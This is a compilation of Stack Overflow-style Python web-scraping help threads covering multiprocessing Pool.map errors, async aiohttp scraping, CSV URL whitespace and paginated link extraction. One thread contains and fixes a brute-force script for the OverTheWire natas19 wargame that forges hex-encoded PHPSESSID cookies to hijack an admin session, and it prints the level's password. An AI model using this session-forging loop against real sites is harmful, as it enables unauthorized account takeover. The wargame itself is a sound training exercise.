Weird error with pool module and beautiful soup: Invalid URL 'h' - python

I am scraping a very large website with Beautiful Soup for a project and want to use the Pool module to speed it up. I am getting a weird error where it is not correctly reading the list of URL's, as far as I can tell it is just grabbing the first 'h'.
The entire code works perfectly if I do not use pool. The list of URL's is read properly. I am not sure if there is something weird about how you have to prepare the URL's when calling p.map(scrapeClauses, links) because if I simply call scrapeClauses(links) everything works.
Here is my main function:
if __name__ == '__main__':
links = list()
og = 'https://www.lawinsider.com'
halflink = '/clause/limitation-of-liability'
link = og + halflink
links.append(link)
i = 0
while i < 50:
try:
nextLink = generateNextLink(link)
links.append(nextLink)
link = nextLink
i += 1
except:
print('Only ', i, 'links found')
i = 50
start_time = time.time()
print(links[0])
p = Pool(5)
p.map(scrapeClauses, links)
p.terminate()
p.join()
#scrapeClauses(links)
and here is scrapeClauses():
def scrapeClauses(links):
#header to avoid site detecting scraper
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
#list of clauses
allText = []
number = 0
for line in links:
page_link = line
print(page_link)
page_response = requests.get(page_link, headers=headers)
html_soup = BeautifulSoup(page_response.content, "html.parser")
assignments = html_soup.find_all('div', class_ ='snippet-content')
for i in range(len(assignments)):
assignments[i] = assignments[i].get_text()
#option to remove te assignment that precedes each clause
#assignments[i] = assignments[i].replace('Assignment.','',1)
allText.append(assignments[i])
#change the index of the name of the word doc
name = 'limitationOfLiability' + str(number) + '.docx'
#some clauses have special characters tat produce an error
try:
document = Document()
stuff = assignments[i]
document.add_paragraph(stuff)
document.save(name)
number += 1
except:
continue
I did not include generateNextLink() to save space and because I am pretty sure the error is not in there but if someone thinks it is I will provide it.
As you can see I 'print(page_link) in scrapeClauses. If I am not using pool, it will print all the normal links. But if I use pool, a bunch of h's print out line after line. I then get and error that h is not a valid URL. I will show the error code below.
https://www.lawinsider.com/clause/limitation-of-liability
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
multiprocessing.pool.RemoteTraceback:
"""
Traceback (most recent call last):
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiproce
ssing\pool.py", line 121, in worker
result = (True, func(*args, **kwds))
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiproce
ssing\pool.py", line 44, in mapstar
return list(map(*args))
File "C:\Users\wquinn\Web Scraping\assignmentBSScraper.py", line 20, in scrape
Clauses
page_response = requests.get(page_link, headers=headers)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\sessions.py", line 519, in request
prep = self.prepare_request(req)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\sessions.py", line 462, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\models.py", line 313, in prepare
self.prepare_url(url, params)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\models.py", line 387, in prepare_url
raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL 'h': No schema supplied. Perhaps
you meant http://h?

The second argument of p.map get an list. Each such element will be sent to a function. So you function got a string and not a list of string as you expect.
The minimal example is:
from multiprocessing import Pool
def f(str_list):
for x in str_list:
print ('hello {}'.format(x))
if __name__ == '__main__':
str_list = ['111', '2', '33']
p = Pool(5)
p.map(f, str_list)
p.terminate()
p.join()
Output is:
hello 1
hello 1
hello 1
hello 2
hello 3
hello 3

Related

Can't put result of hexlify as cookie in requests.post

So the issue is with this code.
import requests
import string
import binascii
import codecs
url="http://natas19.natas.labs.overthewire.org/"
user="natas19"
passwd="8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie=dict(PHPSESSID="0")
test="{}-admin"
for i in range(0,641):
with requests.Session() as sesh:
encoded=binascii.hexlify(bytes(test.format(i),"utf-8"))
print("Trying: " + str(i) + "-admin")
print(encoded)
cookie=dict(PHPSESSID=encoded)
sesh.post(url,auth=(user,passwd),cookies=cookie)
r=sesh.get(url,auth=(user,passwd)).content
print(r)
print(sesh.cookies.get_dict())
if "You are an admin." in str(r):
print("Success! Admin website:\n" + str(sesh.get(url,auth=(user,passwd)).content))
break;
else:
print("Failed.")
The hexlify returns a value like b'302d61646d696e', but the post later on considers it a string for some reason:
Trying: 0-admin
b'302d61646d696e'
Traceback (most recent call last):
File "C:/Users/jakub/Desktop/natas19.py", line 17, in <module>
sesh.post(url,auth=(user,passwd),cookies=cookie)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 635, in post
return self.request("POST", url, data=data, json=json, **kwargs)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 573, in request
prep = self.prepare_request(req)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 471, in prepare_request
cookies = cookiejar_from_dict(cookies)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 537, in cookiejar_from_dict
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 352, in set_cookie
and cookie.value.startswith('"')
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
If I decode the hexlify result instead then the code runs, but without sending the cookie. Please help and thank you in advance!
Try to put .decode('utf-8') at the end of encoded=:
import requests
url = "http://natas19.natas.labs.overthewire.org/"
user = "natas19"
passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie = dict(PHPSESSID="0")
test = "{}-admin"
for i in range(0, 641):
with requests.Session() as sesh:
encoded = binascii.hexlify(bytes(test.format(i), "utf-8")).decode('utf-8') # <-- put decode() here!
print("Trying: " + str(i) + "-admin")
print(encoded)
cookie = dict(PHPSESSID=encoded)
sesh.post(url, auth=(user, passwd), cookies=cookie)
r = sesh.get(url, auth=(user, passwd)).content
print(r)
print(sesh.cookies.get_dict())
if "You are an admin." in str(r):
print(
"Success! Admin website:\n"
+ str(sesh.get(url, auth=(user, passwd)).content)
)
break
else:
print("Failed.")

Why does my second python async (scraping) function (which uses results from the first async (scraping) function) return no result?

Summary of what the program should do:
Step 1 (sync): Determine exactly how many pages need to be scraped.
Step 2 (sync): create the links to the pages to be scraped in a for-loop.
Step 3 (async): Use the link list from step 2 to get the links to the desired detail pages from each of these pages.
Step 4 (async): Use the result from step 3 to extract the detail information for each hofladen. This information is stored in a list for each farm store and each of these lists is appended to a global list.
Where do I have the problem?
The transition from step 3 to step 4 does not seem to work properly.
Traceback (most recent call last):
File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 108, in <module>
asyncio.run(main())
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
return future.result()
File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 96, in main
await asyncio.gather(*tasks_detail_infos)
File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 61, in scrape_detail_infos
data = JsonLdExtractor().extract(body_d)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/extruct/jsonld.py", line 21, in extract
tree = parse_html(htmlstring, encoding=encoding)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/extruct/utils.py", line 10, in parse_html
return lxml.html.fromstring(html, parser=parser)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/lxml/html/__init__.py", line 873, in fromstring
doc = document_fromstring(html, parser=parser, base_url=base_url, **kw)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/lxml/html/__init__.py", line 761, in document_fromstring
raise etree.ParserError(
lxml.etree.ParserError: Document is empty
Process finished with exit code 1
What did I do to isolate the problem?
In a first attempt I rewrote the async function append_detail_infos so that it no longer tries to create a list and append the values but only prints data[0]["name"].
This resulted in the error message
Traceback (most recent call last):
File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 108, in <module>
asyncio.run(main())
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
return future.result()
File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 96, in main
await asyncio.gather(*tasks_detail_infos)
File "/Users/REPLACED_MY_USER/PycharmProjects/PKI-Projekt/test_ttt.py", line 61, in scrape_detail_infos
data = JsonLdExtractor().extract(body_d)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/extruct/jsonld.py", line 21, in extract
tree = parse_html(htmlstring, encoding=encoding)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/extruct/utils.py", line 10, in parse_html
return lxml.html.fromstring(html, parser=parser)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/lxml/html/__init__.py", line 873, in fromstring
doc = document_fromstring(html, parser=parser, base_url=base_url, **kw)
File "/Users/REPLACED_MY_USER/miniconda3/envs/scrapy/lib/python3.10/site-packages/lxml/html/__init__.py", line 761, in document_fromstring
raise etree.ParserError(
lxml.etree.ParserError: Document is empty
Process finished with exit code 1
In the next attempt, I exported the links from detail_links as .csv and visually checked them and opened some of them to see if they were valid. This was also the case.
The program code:
import asyncio
import time
import aiohttp
import requests
import re
from selectolax.parser import HTMLParser
from extruct.jsonld import JsonLdExtractor
import pandas as pd
BASE_URL = "https://hofladen.info"
FIRST_PAGE = 1
def get_last_page(url: str) -> int:
res = requests.get(url).text
html = HTMLParser(res)
last_page = int(re.findall("(\d+)", html.css("li.page-last > a")[0].attributes["href"])[0])
return last_page
def build_links_to_pages(start: int, ende: int) -> list:
lst = []
for i in range(start, ende + 1):
url = f"https://hofladen.info/regionale-produkte?page={i}"
lst.append(url)
return lst
async def scrape_detail_links(url: str):
async with aiohttp.ClientSession() as session:
async with session.get(url, allow_redirects=True) as resp:
body = await resp.text()
html = HTMLParser(body)
for node in html.css(".sp13"):
detail_link = BASE_URL + node.attributes["href"]
detail_links.append(detail_link)
async def append_detail_infos(data):
my_detail_lst = []
# print(data[0]["name"]) # name for debugging purpose
my_detail_lst.append(data[0]["name"]) # name
my_detail_lst.append(data[0]["address"]["streetAddress"]) # str
my_detail_lst.append(data[0]["address"]["postalCode"]) # plz
my_detail_lst.append(data[0]["address"]["addressLocality"]) # ort
my_detail_lst.append(data[0]["address"]["addressRegion"]) # bundesland
my_detail_lst.append(data[0]["address"]["addressCountry"]) # land
my_detail_lst.append(data[0]["geo"]["latitude"]) # breitengrad
my_detail_lst.append(data[0]["geo"]["longitude"]) # längengrad
detail_infos.append(my_detail_lst)
async def scrape_detail_infos(detail_link: str):
async with aiohttp.ClientSession() as session_detailinfos:
async with session_detailinfos.get(detail_link) as res_d:
body_d = await res_d.text()
data = JsonLdExtractor().extract(body_d)
await append_detail_infos(data)
async def main() -> None:
start_time = time.perf_counter()
# Beginn individueller code
# ----------
global detail_links, detail_infos
detail_links, detail_infos = [], []
tasks = []
tasks_detail_infos = []
# extrahiere die letzte zu iterierende Seite
last_page = get_last_page("https://hofladen.info/regionale-produkte")
# scrape detail links
links_to_pages = build_links_to_pages(FIRST_PAGE, last_page)
for link in links_to_pages:
task = asyncio.create_task(scrape_detail_links(link))
tasks.append(task)
print("Saving the output of extracted information.")
await asyncio.gather(*tasks)
pd.DataFrame(data=detail_links).to_csv("detail_links.csv")
# scrape detail infos
for detail_url in detail_links:
task_detail_infos = asyncio.create_task(scrape_detail_infos(detail_url))
tasks_detail_infos.append(task_detail_infos)
await asyncio.gather(*tasks_detail_infos)
# Ende individueller Code
# ------------
time_difference = time.perf_counter() - start_time
print(f"Scraping time: {time_difference} seconds.")
print(len(detail_links))
# print(detail_infos[])
asyncio.run(main())
A working solution to the problem:
added python allow_redirects=True to python async with session_detailinfos.get(detail_link, allow_redirects=True) as res_d:
added python return_exceptions=True to python await asyncio.gather(*tasks_detail_infos, return_exceptions=True)
A working solution to the problem:
added
python allow_redirects=True to python async with session_detailinfos.get(detail_link, allow_redirects=True) as res_d:
added python return_exceptions=True to python await asyncio.gather(*tasks_detail_infos, return_exceptions=True)

Unexpected space (not sure what the type of character this space is) while parsing csv file in python

I am iterating through a list of urls from a csv file trying to locate their sitemaps, however, I am getting a weird leading space issue that's causing an error to occur when requests processes each url. I'm trying to figure out what's causing this space to be generated and what type of space it is. I believe something funky is happening with strip() because I can get this to run fine when copying and pasting a url into requests. I am just not sure what type of space this is and what's causing it to occur.
Wondering if anyone else is having or had this issue?
So far I have tried to solve using the following methods:
replace()
"".join(split())
regex
Here is my code:
with open('links.csv') as f:
for line in f:
strdomain = line.strip()
if strdomain:
domain = strdomain
fix_domain = domain.replace('https://', '').replace('www', '').replace('/', '').replace('.', '').replace(' ', '')
ofile = fix_domain + '.txt' # args.ofile
domain_rem = domain
map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
url_info = find_sitemap.parse_sitemap(map)
print("Found {0} urls".format(len(url_info)))
new_urls = []
for u in url_info:
new_urls.append(u)
print(u)
links.csv look like the following with just one column:
https://site1.com/
https://site2.com/
https://site3.com/
I printed domain and strdomain and even added the word "this" next to the variable domain so you can see the space being produced clearly:
Here is the error I receive in full when running (you will notice there is no leading space within the url after I've copied and pasted from the terminal into here however I provide an image of my terminal below so you can see it):
Traceback (most recent call last):
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 358, in <module>
main()
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 318, in main
map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/find_sitemap.py", line 5, in get_sitemap
get_url = requests.get(url)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 72, in get
return request('get', url, params=params, **kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 522, in request
resp = self.send(prep, **send_kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 636, in send
adapter = self.get_adapter(url=request.url)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 727, in get_adapter
raise InvalidSchema("No connection adapters were found for '%s'" % url)
requests.exceptions.InvalidSchema: No connection adapters were found for 'https://blkgrn.com/sitemap.xml'
Here is where you can see the leading space that occurs
Here is the code for "find_sitemap.py":
from bs4 import BeautifulSoup
import requests
def get_sitemap(url):
get_url = requests.get(url)
if get_url.status_code == 200:
return get_url.text
else:
print ('Unable to fetch sitemap: %s.' % url)
def process_sitemap(s):
soup = BeautifulSoup(s, "lxml")
result = []
for loc in soup.findAll('loc'):
item = {}
item['loc'] = loc.text
item['tag'] = loc.parent.name
if loc.parent.lastmod is not None:
item['lastmod'] = loc.parent.lastmod.text
if loc.parent.changeFreq is not None:
item['changeFreq'] = loc.parent.changeFreq.text
if loc.parent.priority is not None:
item['priority'] = loc.parent.priority.text
result.append(item)
return result
def is_sub_sitemap(s):
if s['loc'].endswith('.xml') and s['tag'] == 'sitemap':
return True
else:
return False
def parse_sitemap(s):
sitemap = process_sitemap(s)
result = []
while sitemap:
candidate = sitemap.pop()
if is_sub_sitemap(candidate):
sub_sitemap = get_sitemap(candidate['loc'])
for i in process_sitemap(sub_sitemap):
sitemap.append(i)
else:
result.append(candidate)
return result

Multiprocessing with text scraping

I want to scrape <p> from pages and since there will be a couple thousands of them I want to use multiprocessing. However, it doesn't work when I try to append the result to some variable
I want to append the result of scraping to the data = []
I made a url_common for a base website since some pages don't start with HTTP etc.
from tqdm import tqdm
import faster_than_requests as requests #20% faster on average in my case than urllib.request
import bs4 as bs
def scrape(link, data):
for i in tqdm(link):
if i[:3] !='htt':
url_common = 'https://www.common_url.com/'
else:
url_common = ''
try:
ht = requests.get2str(url_common + str(i))
except:
pass
parsed = bs.BeautifulSoup(ht,'lxml')
paragraphs = parsed.find_all('p')
for p in paragraphs:
data.append(p.text)
Above doesn't work, since map() doesn't accept function like above
I tried to use it another way:
def scrape(link):
for i in tqdm(link):
if i[:3] !='htt':
url_common = 'https://www.common_url.com/'
else:
url_common = ''
try:
ht = requests.get2str(url_common + str(i))
except:
pass
parsed = bs.BeautifulSoup(ht,'lxml')
paragraphs = parsed.find_all('p')
for p in paragraphs:
print(p.text)
from multiprocessing import Pool
p = Pool(10)
links = ['link', 'other_link', 'another_link']
data = p.map(scrape, links)
I get this error while using above function:
Traceback (most recent call last):
File "C:\ProgramData\Anaconda3\lib\multiprocessing\process.py", line 297, in _bootstrap
self.run()
File "C:\ProgramData\Anaconda3\lib\multiprocessing\process.py", line 99, in run
self._target(*self._args, **self._kwargs)
File "C:\ProgramData\Anaconda3\lib\multiprocessing\pool.py", line 110, in worker
task = get()
File "C:\ProgramData\Anaconda3\lib\multiprocessing\queues.py", line 354, in get
return _ForkingPickler.loads(res)
AttributeError: Can't get attribute 'scrape' on <module '__main__' (built-in)>
I have not figured a way to do it so that it uses Pool and at the same time appending the result of scraping to the given variable
EDIT
I change a little bit to see where it stops:
def scrape(link):
for i in tqdm(link):
if i[:3] !='htt':
url_common = 'https://www.investing.com/'
else:
url_common = ''
try: #tries are always halpful with url as you never know
ht = requests.get2str(url_common + str(i))
except:
pass
print('works1')
parsed = bs.BeautifulSoup(ht,'lxml')
paragraphs = parsed.find_all('p')
print('works2')
for p in paragraphs:
print(p.text)
links = ['link', 'other_link', 'another_link']
scrape(links)
#WORKS PROPERLY AND PRINTS EVERYTHING
if __name__ == '__main__':
p = Pool(5)
print(p.map(scrape, links))
#DOESN'T WORK, NOTHING PRINTS. Error like above
You are using the map function incorrectly.
It iterates over each element of the iterable and calls the function on each element.
You can see the map function as doing something like the following:
to_be_mapped = [1, 2, 3]
mapped = []
def mapping(x): # <-- note that the mapping accepts a single value
return x**2
for item in to_be_mapped:
res = mapping(item)
mapped.append(res)
So to solve your problem remove the outermost for-loop as iterating is handled by the map function
def scrape(link):
if link[:3] !='htt':
url_common = 'https://www.common_url.com/'
else:
url_common = ''
try:
ht = requests.get2str(url_common + str(link))
except:
pass
parsed = bs.BeautifulSoup(ht,'lxml')
paragraphs = parsed.find_all('p')
for p in paragraphs:
print(p.text)

How to scrape many dynamic urls in Python

I want to scrape one dynamic url at a time.
What I did is that I scrape the URL from that I get from all the hrefs and then I want to scrape that URL.
What I am trying:
from bs4 import BeautifulSoup
import urllib.request
import re
r = urllib.request.urlopen('http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware')
soup = BeautifulSoup(r, "html.parser")
links = soup.find_all("a", href=re.compile(r"expexhibitorlist\.aspx\?categoryno=[0-9]+"))
linksfromcategories = ([link["href"] for link in links])
string = "http://i.cantonfair.org.cn/en/"
str1 = [string + x for x in linksfromcategories]
fulllinksfromcategories = '\n'.join(str1)
lfc = urllib.request.urlopen(fulllinksfromcategories).read()
soup2 = BeautifulSoup(lfc,"html.parser")
print(soup2)
But it gives me the following error:
Traceback (most recent call last):
File "D:\python\scarpepython.py", line 50, in <module>
lfc = urllib.request.urlopen(fulllinksfromcategories).read()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 162, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 465, in open
response = self._open(req, data)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 483, in _open
'_open', req)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 443, in _call_chain
result = func(*args)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1268, in http_open
return self.do_open(http.client.HTTPConnection, req)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1243, in do_open
r = h.getresponse()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 1174, in getresponse
response.begin()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 282, in begin
version, status, reason = self._read_status()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 264, in _read_status
raise BadStatusLine(line)
http.client.BadStatusLine:
this could be an option using lxml.
from sys import exit
from pprint import pprint
import lxml.html
import requests
import re
url = 'http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page=1'
doc = requests.get(url)
root = lxml.html.fromstring(doc.text)
regexp_total_pages = re.compile(ur"Pages\s\d\/(\d+)")
text_total_pages = root.xpath('//*[#id="AspNetPager1"]/div[1]/text()')[0].strip()
total_pages = int(re.match(regexp_total_pages,text_total_pages).group(1))
all_links = list()
for i in range(1,total_pages + 1):
url = "http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page={page}".format(page=i)
doc = requests.get(url)
root = lxml.html.fromstring(doc.text)
all_links.append(root.xpath('//*[#id="form1"]/div[*]/div[*]/h3/a/#href'))
pprint(all_links)
Output:
[['expCompany.aspx?corpid=0776011226',
'expCompany.aspx?corpid=0767408756',
'expCompany.aspx?corpid=0768210055',
'expCompany.aspx?corpid=0797720568',
'expCompany.aspx?corpid=0732708199',
'expCompany.aspx?corpid=0793210033',
'expCompany.aspx?corpid=0732106474',
'expCompany.aspx?corpid=0758010034',
'expCompany.aspx?corpid=0971067386',
'expCompany.aspx?corpid=0740321671'],
['expCompany.aspx?corpid=0778019678',
'expCompany.aspx?corpid=0856547211',
'expCompany.aspx?corpid=0786118468',
'expCompany.aspx?corpid=0836547578',
'expCompany.aspx?corpid=0898829143',
'expCompany.aspx?corpid=0785822466',
'expCompany.aspx?corpid=0886647641',
'expCompany.aspx?corpid=0965278225',
'expCompany.aspx?corpid=0889552449',
'expCompany.aspx?corpid=0757118156'],
['expCompany.aspx?corpid=0800629095',
'expCompany.aspx?corpid=0797100877',
'expCompany.aspx?corpid=0791001566',
'expCompany.aspx?corpid=0955274359',
'expCompany.aspx?corpid=0789803409',
'expCompany.aspx?corpid=0769413578',
'expCompany.aspx?corpid=0712314777',
'expCompany.aspx?corpid=0873048367',
'expCompany.aspx?corpid=0716520166',
'expCompany.aspx?corpid=1444012375'],
['expCompany.aspx?corpid=1020485398',
'expCompany.aspx?corpid=1218502245',
'expCompany.aspx?corpid=1197393480',
'expCompany.aspx?corpid=1366309374',
'expCompany.aspx?corpid=1204799012',
'expCompany.aspx?corpid=1078880722',
'expCompany.aspx?corpid=1367905785',
'expCompany.aspx?corpid=1427517382',
'expCompany.aspx?corpid=1377308235',
'expCompany.aspx?corpid=1437717128'],
['expCompany.aspx?corpid=1361609356',
'expCompany.aspx?corpid=1532524260',
'expCompany.aspx?corpid=1512425129',
'expCompany.aspx?corpid=1371110608',
'expCompany.aspx?corpid=1021582521',
'expCompany.aspx?corpid=0829323712',
'expCompany.aspx?corpid=0756508698',
'expCompany.aspx?corpid=0781315922',
'expCompany.aspx?corpid=0850325858',
'expCompany.aspx?corpid=0713405337'],
['expCompany.aspx?corpid=0895550135',
'expCompany.aspx?corpid=0736604457',
'expCompany.aspx?corpid=0761821937',
'expCompany.aspx?corpid=0853755897',
'expCompany.aspx?corpid=0807455302',
'expCompany.aspx?corpid=0763919269',
'expCompany.aspx?corpid=0736104221',
'expCompany.aspx?corpid=0796616555',
'expCompany.aspx?corpid=0804229227',
'expCompany.aspx?corpid=0746304700'],
['expCompany.aspx?corpid=0839047328',
'expCompany.aspx?corpid=0875628420',
'expCompany.aspx?corpid=0869651030',
'expCompany.aspx?corpid=0838653323',
'expCompany.aspx?corpid=0779107569',
'expCompany.aspx?corpid=0748806674',
'expCompany.aspx?corpid=0736602141',
'expCompany.aspx?corpid=0722715458',
'expCompany.aspx?corpid=0782910676',
'expCompany.aspx?corpid=0798114121'],
['expCompany.aspx?corpid=0830450037',
'expCompany.aspx?corpid=0723700490',
'expCompany.aspx?corpid=0889823692',
'expCompany.aspx?corpid=0984073042',
'expCompany.aspx?corpid=0726719753',
'expCompany.aspx?corpid=0742406942',
'expCompany.aspx?corpid=0742119461',
'expCompany.aspx?corpid=0728315987',
'expCompany.aspx?corpid=0818248812',
'expCompany.aspx?corpid=0750419352'],
['expCompany.aspx?corpid=0982275722',
'expCompany.aspx?corpid=0815756641',
'expCompany.aspx?corpid=0712604536',
'expCompany.aspx?corpid=0798617576',
'expCompany.aspx?corpid=0734217566',
'expCompany.aspx?corpid=0878728894',
'expCompany.aspx?corpid=0772422523',
'expCompany.aspx?corpid=0784607985',
'expCompany.aspx?corpid=0786204936',
'expCompany.aspx?corpid=0886423907'],
['expCompany.aspx?corpid=0789300431',
'expCompany.aspx?corpid=0779921604',
'expCompany.aspx?corpid=0794403082',
'expCompany.aspx?corpid=0769111680',
'expCompany.aspx?corpid=0746606839',
'expCompany.aspx?corpid=0896726003',
'expCompany.aspx?corpid=0886728390',
'expCompany.aspx?corpid=0841756743',
'expCompany.aspx?corpid=1010680461',
'expCompany.aspx?corpid=0837456503'],
['expCompany.aspx?corpid=0735317945',
'expCompany.aspx?corpid=0858556012',
'expCompany.aspx?corpid=0883227862',
'expCompany.aspx?corpid=0802151577',
'expCompany.aspx?corpid=0725403915',
'expCompany.aspx?corpid=0773118307',
'expCompany.aspx?corpid=0977967839',
'expCompany.aspx?corpid=0889257398',
'expCompany.aspx?corpid=0773003774',
'expCompany.aspx?corpid=0741211862'],
['expCompany.aspx?corpid=0944767300',
'expCompany.aspx?corpid=0766703225',
'expCompany.aspx?corpid=0807623222',
'expCompany.aspx?corpid=0754416485',
'expCompany.aspx?corpid=0716414765',
'expCompany.aspx?corpid=0764603066',
'expCompany.aspx?corpid=0757110589',
'expCompany.aspx?corpid=0800248632',
'expCompany.aspx?corpid=0747902779',
'expCompany.aspx?corpid=0738619647'],
['expCompany.aspx?corpid=1098582416',
'expCompany.aspx?corpid=0909669961',
'expCompany.aspx?corpid=0862829627',
'expCompany.aspx?corpid=0892328884',
'expCompany.aspx?corpid=0886729635',
'expCompany.aspx?corpid=0724805261',
'expCompany.aspx?corpid=0877655294',
'expCompany.aspx?corpid=0835853958',
'expCompany.aspx?corpid=0737821957',
'expCompany.aspx?corpid=0785019255'],
['expCompany.aspx?corpid=0873828585',
'expCompany.aspx?corpid=0735401884',
'expCompany.aspx?corpid=0927058069',
'expCompany.aspx?corpid=0794816876',
'expCompany.aspx?corpid=0721211392',
'expCompany.aspx?corpid=0741602341',
'expCompany.aspx?corpid=0760906105',
'expCompany.aspx?corpid=0904473659',
'expCompany.aspx?corpid=0711614568',
'expCompany.aspx?corpid=0753503530'],
['expCompany.aspx?corpid=0774108002',
'expCompany.aspx?corpid=0845328722',
'expCompany.aspx?corpid=0823848403',
'expCompany.aspx?corpid=0876029511',
'expCompany.aspx?corpid=0886827914',
'expCompany.aspx?corpid=0712712280',
'expCompany.aspx?corpid=0833854881',
'expCompany.aspx?corpid=0746216867',
'expCompany.aspx?corpid=0774704214',
'expCompany.aspx?corpid=0730516488'],
['expCompany.aspx?corpid=0716607064',
'expCompany.aspx?corpid=0758917403',
'expCompany.aspx?corpid=0763702256',
'expCompany.aspx?corpid=0721303394',
'expCompany.aspx?corpid=0828647452',
'expCompany.aspx?corpid=0771805641',
'expCompany.aspx?corpid=0741722489',
'expCompany.aspx?corpid=0980867582',
'expCompany.aspx?corpid=0790809611',
'expCompany.aspx?corpid=0714917484'],
['expCompany.aspx?corpid=0790402155',
'expCompany.aspx?corpid=0710118558',
'expCompany.aspx?corpid=0864455955',
'expCompany.aspx?corpid=0784706276',
'expCompany.aspx?corpid=0897623416',
'expCompany.aspx?corpid=0821453137',
'expCompany.aspx?corpid=0754917280',
'expCompany.aspx?corpid=0724600646',
'expCompany.aspx?corpid=0764211415',
'expCompany.aspx?corpid=0735008307'],
['expCompany.aspx?corpid=0795909343',
'expCompany.aspx?corpid=0850830043',
'expCompany.aspx?corpid=0970778277',
'expCompany.aspx?corpid=1075781404',
'expCompany.aspx?corpid=1252802513',
'expCompany.aspx?corpid=1236901616',
'expCompany.aspx?corpid=1435215908',
'expCompany.aspx?corpid=1469712283',
'expCompany.aspx?corpid=1439615100',
'expCompany.aspx?corpid=1245501009'],
['expCompany.aspx?corpid=0901974362',
'expCompany.aspx?corpid=1487117816',
